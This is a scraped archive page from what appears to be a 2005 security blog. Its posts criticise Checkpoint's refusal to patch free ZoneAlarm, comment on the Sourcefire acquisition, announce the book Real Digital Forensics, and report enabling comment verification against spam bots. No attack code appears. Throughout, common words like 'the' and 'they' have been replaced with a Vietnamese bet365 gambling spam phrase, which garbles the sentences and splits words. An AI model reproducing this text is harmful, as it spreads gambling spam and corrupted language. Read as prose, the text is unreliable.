You may have seen how Checkpoint is treating users of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 free version of Zonealarm, which was purchased by Checkpoint two years ago for $225 million. Sure, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 basic Zonealarm firewall is still free, but Checkpoint will not provide a patch for a new security problem. Checkpoint claims cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 problem has low severity even though proof of concept code exists. To quote John LaCour, director of security services: "It is a cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365oretical attack that we don't see used in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 real world." Great. That rationale has certainly stood cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 test of time (not).
However, I do not fault Sourcefire at all for being purchased. I never faulted cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 way cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y handled cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 new rules licensing, eicá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r. The amount of manpower and resources cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y devote to Snort is incredible, so I am happy to see cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m be rewarded. I am just not sure Checkpoint is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 right fit, at least from where I stand. What are your thoughts?
Saturday, October 01, 2005
Real Digital Forensics and Shirts
I also received my copy of our new book Real Digital Forensics, also pictured at right. You can visit cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 pubisher Addison-Wesley to review cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 table of contents, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 preface, and also download cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first chapter. It's a review of Windows live response.
I think you will really enjoy this book. I wrote with Keith Jones and Curtis Rose from Red Cliff Consulting. The project was two, almost three years in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 making. In cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 book we look at intrusions from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 perspective of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 file system, memory, and network activity. (Guess who handled cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 network side?) :) All of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 evidence we analyze is included on a DVD shipped with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 book.
Comment Verification Activated
Some idiot's comment spam bot posted over 70 "comments" to this blog last night. I am working my way through deleting cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m all. This is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 latest salvo in an escalating battle which starting which intermittent spam comments several months ago. To try to reduce cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se automated attacks in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 future, I've enabled comment verification. I hope it is not too onerous for those making legitimate comments. Thank you.
Subscribe to:
Posts (Atom)
